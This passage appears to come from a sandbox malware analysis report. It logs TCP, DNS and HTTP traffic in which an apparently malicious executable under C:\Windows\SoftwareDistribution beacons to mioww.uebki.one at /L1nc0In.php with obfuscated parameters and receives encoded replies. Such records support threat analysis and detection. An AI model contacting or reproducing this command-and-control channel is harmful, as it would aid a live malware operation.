                              Aug 31, 2024 10:14:04.932126045 CEST4976280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:04.936945915 CEST8049762188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:04.937002897 CEST4976280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:04.937145948 CEST4976280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:04.942114115 CEST8049762188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:04.942122936 CEST8049762188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:05.668186903 CEST8049762188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:05.852395058 CEST4976280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:10.680989981 CEST4976280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:10.681895018 CEST4976380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:10.686125040 CEST8049762188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:10.686172962 CEST4976280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:10.686682940 CEST8049763188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:10.686744928 CEST4976380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:10.686887980 CEST4976380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:10.691646099 CEST8049763188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:10.691770077 CEST8049763188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:11.483720064 CEST8049763188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:11.525377989 CEST4976380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:16.494734049 CEST4976380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:16.499938011 CEST8049763188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:16.499991894 CEST4976380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:16.500957012 CEST4976480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:16.505744934 CEST8049764188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:16.505803108 CEST4976480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:16.505985975 CEST4976480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:16.510893106 CEST8049764188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:16.510902882 CEST8049764188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:17.249116898 CEST8049764188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:17.293445110 CEST4976480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:22.260144949 CEST4976580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:22.265023947 CEST8049765188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:22.265095949 CEST4976580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:22.265259981 CEST4976580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:22.270234108 CEST8049765188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:22.270256996 CEST8049765188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:22.996205091 CEST8049765188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:23.039881945 CEST4976580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:28.009744883 CEST4976580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:28.009744883 CEST4976680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:28.014719963 CEST8049766188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:28.014925957 CEST8049765188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:28.015688896 CEST4976580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:28.015688896 CEST4976680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:28.015846014 CEST4976680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:28.021277905 CEST8049766188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:28.021380901 CEST8049766188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:28.572233915 CEST8049766188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:28.618051052 CEST4976680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:28.705043077 CEST8049766188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:28.758632898 CEST4976680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:33.712949991 CEST4976780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:33.712954044 CEST4976680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:33.717854023 CEST8049767188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:33.717952967 CEST4976780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:33.718043089 CEST8049766188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:33.718046904 CEST4976780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:33.718116999 CEST4976680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:33.722805977 CEST8049767188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:33.722939968 CEST8049767188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:34.443567991 CEST8049767188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:34.602394104 CEST4976780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:39.447510004 CEST4976780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:39.447510958 CEST4976880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:39.452395916 CEST8049768188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:39.452529907 CEST4976880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:39.452686071 CEST4976880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:39.452718019 CEST8049767188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:39.452912092 CEST4976780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:39.457612038 CEST8049768188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:39.457669020 CEST8049768188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:40.161600113 CEST8049768188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:40.211783886 CEST4976880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.165518999 CEST4976880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.166462898 CEST4976980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.171022892 CEST8049768188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:45.171082020 CEST4976880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.171364069 CEST8049769188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:45.171431065 CEST4976980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.172364950 CEST4976980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.172538042 CEST4976480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.172601938 CEST4974480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.172708035 CEST4975780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.172755003 CEST4974780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:45.177181959 CEST8049769188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:45.177298069 CEST8049769188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:45.912075043 CEST8049769188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:46.009402037 CEST4976980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:50.915859938 CEST4976980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:50.918860912 CEST4977080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:50.921050072 CEST8049769188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:50.921102047 CEST4976980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:50.923609972 CEST8049770188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:50.923667908 CEST4977080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:50.925854921 CEST4977080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:50.930658102 CEST8049770188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:50.930999994 CEST8049770188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:51.694890976 CEST8049770188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:51.805557966 CEST4977080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:56.696700096 CEST4977080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:56.697675943 CEST4977180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:56.705300093 CEST8049771188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:56.705377102 CEST4977180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:56.705468893 CEST4977180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:56.705745935 CEST8049770188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:56.705791950 CEST4977080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:14:56.710341930 CEST8049771188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:56.710593939 CEST8049771188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:57.466830969 CEST8049771188.114.97.3192.168.2.4
                              Aug 31, 2024 10:14:57.508759975 CEST4977180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:02.477890968 CEST4977180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:02.478924036 CEST4977280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:02.483541012 CEST8049771188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:02.483603001 CEST4977180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:02.483732939 CEST8049772188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:02.483800888 CEST4977280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:02.483905077 CEST4977280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:02.488756895 CEST8049772188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:02.489159107 CEST8049772188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:03.243643045 CEST8049772188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:03.295084000 CEST4977280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:08.259485960 CEST4977280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:08.259968042 CEST4977380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:08.264858007 CEST8049773188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:08.264955997 CEST4977380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:08.264978886 CEST8049772188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:08.265074968 CEST4977380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:08.265152931 CEST4977280192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:08.270057917 CEST8049773188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:08.270219088 CEST8049773188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:09.023008108 CEST8049773188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:09.071201086 CEST4977380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:14.025434017 CEST4977380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:14.025659084 CEST4977480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:14.031586885 CEST8049774188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:14.032162905 CEST8049773188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:14.032264948 CEST4977380192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:14.032264948 CEST4977480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:14.032521009 CEST4977480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:14.038412094 CEST8049774188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:14.038753033 CEST8049774188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:14.768651009 CEST8049774188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:14.768927097 CEST4977480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:14.775453091 CEST8049774188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:14.775505066 CEST4977480192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:19.801438093 CEST4977580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:19.806513071 CEST8049775188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:19.809547901 CEST4977580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:19.813437939 CEST4977580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:19.822865009 CEST8049775188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:19.822876930 CEST8049775188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:20.526448965 CEST8049775188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:20.595700979 CEST4977580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:25.742005110 CEST4977580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:25.742614031 CEST4977680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:25.747634888 CEST8049775188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:25.747648954 CEST8049776188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:25.747766018 CEST4977680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:25.747766018 CEST4977580192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:25.747983932 CEST4977680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:25.753068924 CEST8049776188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:25.753077984 CEST8049776188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:26.482889891 CEST8049776188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:26.576679945 CEST4977680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:31.502337933 CEST4977680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:31.502835989 CEST4977780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:31.509509087 CEST8049776188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:31.509699106 CEST4977680192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:31.509812117 CEST8049777188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:31.509994984 CEST4977780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:31.510073900 CEST4977780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:31.515680075 CEST8049777188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:31.515986919 CEST8049777188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:32.248987913 CEST8049777188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:32.289987087 CEST4977780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:37.264101028 CEST4977780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:37.265393972 CEST4977880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:37.306761980 CEST8049778188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:37.306828022 CEST4977880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:37.306967020 CEST4977880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:37.307075977 CEST8049777188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:37.307121992 CEST4977780192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:37.314841032 CEST8049778188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:37.315331936 CEST8049778188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:38.066867113 CEST8049778188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:38.121459007 CEST4977880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:43.072146893 CEST4977880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:43.072793007 CEST4977980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:43.077373028 CEST8049778188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:43.077428102 CEST4977880192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:43.077614069 CEST8049779188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:43.077703953 CEST4977980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:43.077822924 CEST4977980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:43.082899094 CEST8049779188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:43.082926035 CEST8049779188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:43.792327881 CEST8049779188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:44.008378983 CEST8049779188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:44.009452105 CEST4977980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:44.009533882 CEST4977980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:48.819789886 CEST4977980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:48.820271969 CEST4978080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:48.825079918 CEST8049779188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:48.825134993 CEST4977980192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:48.825257063 CEST8049780188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:48.825321913 CEST4978080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:48.830816031 CEST4978080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:48.835655928 CEST8049780188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:48.835766077 CEST8049780188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:49.567601919 CEST8049780188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:49.619513988 CEST4978080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:54.572088003 CEST4978080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:54.572896004 CEST4978180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:54.747196913 CEST8049781188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:54.747296095 CEST4978180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:54.747430086 CEST4978180192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:54.747797966 CEST8049780188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:54.747849941 CEST4978080192.168.2.4188.114.97.3
                              Aug 31, 2024 10:15:54.753592968 CEST8049781188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:54.753946066 CEST8049781188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:55.499761105 CEST8049781188.114.97.3192.168.2.4
                              Aug 31, 2024 10:15:55.696244955 CEST4978180192.168.2.4188.114.97.3

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 31, 2024 10:11:56.717282057 CEST6427653192.168.2.41.1.1.1
                              Aug 31, 2024 10:11:56.732362032 CEST53642761.1.1.1192.168.2.4

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Aug 31, 2024 10:11:56.717282057 CEST192.168.2.41.1.1.10x4a7aStandard query (0)mioww.uebki.oneA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Aug 31, 2024 10:11:56.732362032 CEST1.1.1.1192.168.2.40x4a7aNo error (0)mioww.uebki.one188.114.97.3A (IP address)IN (0x0001)false
                              Aug 31, 2024 10:11:56.732362032 CEST1.1.1.1192.168.2.40x4a7aNo error (0)mioww.uebki.one188.114.96.3A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • mioww.uebki.one

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449730188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:11:56.743779898 CEST572OUTGET /L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&79bfb28a16afb84a575d312c4453c517=f06eb19c95e712422ee4c585262cca64&5690ae1271d74814e0008b34a8c960fd=gY5QWY2UGO4EzYkRDO3MWO5YzYmRmY4YmYiJGO3cjZwMWY2I2YkJTY&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:11:57.440989971 CEST1236INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:11:57 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L0KYhfXKRV6jL9XYfbgXxWy8NusJW31jVQ9DsjPMAK2BWUIrtN0zHvVgQoV094gQy8UlQVIzGjkZqSvHSb6Wisa44NWSlcJZOhWT7RYvPmVRmZQVHYJoV4WJEiMiGRlazuI%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8d822e9441bd-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 38 36 63 0d 0a 39 4a 69 5a 77 55 6d 5a 34 51 32 4e 34 49 32 4d 68 4e 57 4e 34 45 6d 4e 33 51 44 4d 69 4a 44 4d 79 4d 47 4f 34 51 44 4e 7a 51 7a 4e 32 49 69 4f 69 51 54 4d 69 6c 54 4f 77 45 57 59 31 59 54 59 69 46 44 5a 6d 56 44 5a 7a 45 44 4d 7a 59 44 4d 7a 6b 54 4d 31 51 57 4e 79 63 44 5a 69 77 69 49 6d 46 31 62 33 39 55 61 4b 6c 6e 57 59 4a 56 65 61 68 6c 57 31 4a 47 4d 4f 56 54 57 79 55 44 62 6a 35 6d 53 78 6b 56 4d 35 55 58 59 58 52 57 4d 69 68 6b 51 32 70 31 56 6a 6c 57 53 44 46 30 53 4d 4e 55 53 72 6c 6b 61 76 6c 32 54 46 70 56 56 57 5a 56 4f 7a 4a 6d 4d 4b 52 58 5a 57 35 55 4e 5a 4a 54 4e 73 4e 6d 62 4b 46 54 57 78 6b 54 64 68 64 46 5a 78 49 47 53 43 5a 6e 57 58 4e 57 61 4a 4e 55 51 4c 78 30 51 4a 74 57 53 71 39 57 61 69 64 55 4f 70 4a 47 57 73 52 56 5a 58 35 55 64 61 68 6c 53 35 52 32 56 4f 5a 6d 59 74 78 6d 62 6b 64 46 65 33 4a 6d 4d 57 35 57 53 70 46 30 5a 44 6c 32 64 70 4a 6c 52 4f 5a 56 53 71 39 57 61 61 64 6c 55 32 46 31 4d 73 70 6d 59 74 5a 56 65 6a 35 6d 56 71 68 6c 4d 31 41 6e 57 7a [TRUNCATED]
                              Data Ascii: 86c9JiZwUmZ4Q2N4I2MhNWN4EmN3QDMiJDMyMGO4QDNzQzN2IiOiQTMilTOwEWY1YTYiFDZmVDZzEDMzYDMzkTM1QWNycDZiwiImF1b39UaKlnWYJVeahlW1JGMOVTWyUDbj5mSxkVM5UXYXRWMihkQ2p1VjlWSDF0SMNUSrlkavl2TFpVVWZVOzJmMKRXZW5UNZJTNsNmbKFTWxkTdhdFZxIGSCZnWXNWaJNUQLx0QJtWSq9WaidUOpJGWsRVZX5UdahlS5R2VOZmYtxmbkdFe3JmMW5WSpF0ZDl2dpJlROZVSq9WaadlU2F1MspmYtZVej5mVqhlM1AnWzY1cjdUOspVeJdWSB92cJ1Gd5JWMsZGZyY1TMFDeollMslnWXFjQJp2bpp1V1YXZtZFdhhlUmJWbs5GZXh3diJjVulUaBd2QpdXaNRUSp9UaKpHZXx2aZZlS1klMGlHZX5kaRdVN2FGWShWWykzcYJTNwp1MWN3YHlDbalXSnlUQvNXSqdmMNRUQ15ERjRXSq9WaadlUxQ2Rs5mYtlzcYJTNwp1MWN3YHlDbalXSnlUQvNXSq1UeNR1Y11ERRl2TppEbahkVwEGWShmYGlTdhdFZxIGSCZnWXNWaJ
                              Aug 31, 2024 10:11:57.441009045 CEST1236INData Raw: 4e 55 51 4c 78 30 51 4b 68 57 57 79 77 57 65 61 64 56 4d 43 6c 30 52 6f 42 7a 59 74 6c 7a 54 4a 70 32 62 70 70 31 56 78 67 47 56 75 4a 56 64 61 64 56 4e 77 52 32 52 31 59 58 57 78 6b 54 64 68 64 46 5a 78 49 47 53 43 5a 6e 57 58 4e 57 61 4a 4e 55
                              Data Ascii: NUQLx0QKhWWywWeadVMCl0RoBzYtlzTJp2bpp1VxgGVuJVdadVNwR2R1YXWxkTdhdFZxIGSCZnWXNWaJNUQLx0QKJEVplkNJ1mVrJGMOBjYtZVdhhlU1JmMOZmYtxmbkdFe3JmMW5WSpF0ZDlGesNmM4hmWq9WaahlUoNGbSJkVuZFbYJTNwp1MWN3YHlDbalXSnlUQvNXTE9WaWVlV1FmV5UXYXRWMihkQ2p1VjlWSDF0SMNkS
                              Aug 31, 2024 10:11:57.441026926 CEST302INData Raw: 6c 6c 4d 4f 64 6c 52 75 4a 6d 62 57 39 57 57 7a 59 6c 63 6b 64 6b 56 31 46 32 56 77 30 6a 49 36 49 53 4d 7a 67 54 59 78 45 6d 59 34 55 7a 59 6b 46 57 4e 69 5a 44 4f 79 59 57 4d 68 4a 54 4d 6c 4a 57 4e 6b 52 57 4e 77 51 32 4e 35 49 43 4c 69 49 47
                              Data Ascii: llMOdlRuJmbW9WWzYlckdkV1F2Vw0jI6ISMzgTYxEmY4UzYkFWNiZDOyYWMhJTMlJWNkRWNwQ2N5ICLiIGO2YWM0YjY5ImZlFGN2gDNlJWZ3gDNxQTZwYmMwMWMiojIiFGN2ATZ5UGZmNjMjJjYwMGZxcDOyUWMzYGZ5IWNxAjIsICOhdjZ2QWZyAjNmlDZxkzMwgTZkZmMyYTZiNGZzIWZzUzMlljMhRmZ1EDNyczNxUTN0kTN
                              Aug 31, 2024 10:11:58.639460087 CEST2103OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRK [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:11:58.911325932 CEST729INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:11:58 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y4VAsPxuIai%2BN5iTSU7LR2uXa1qM2gu2qXZ928v9aTYJxgCVBuyWk21GTCEtFDyT0aVtr8ZwkoHML8ZzuEbmjeJmffsr1e4OedvdakDS%2FWEzPDXNzjwnYo%2FfzrXFUMj%2FlNM%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8d8bcf1341bd-EWR
                              alt-svc: h3=":443"; ma=86400
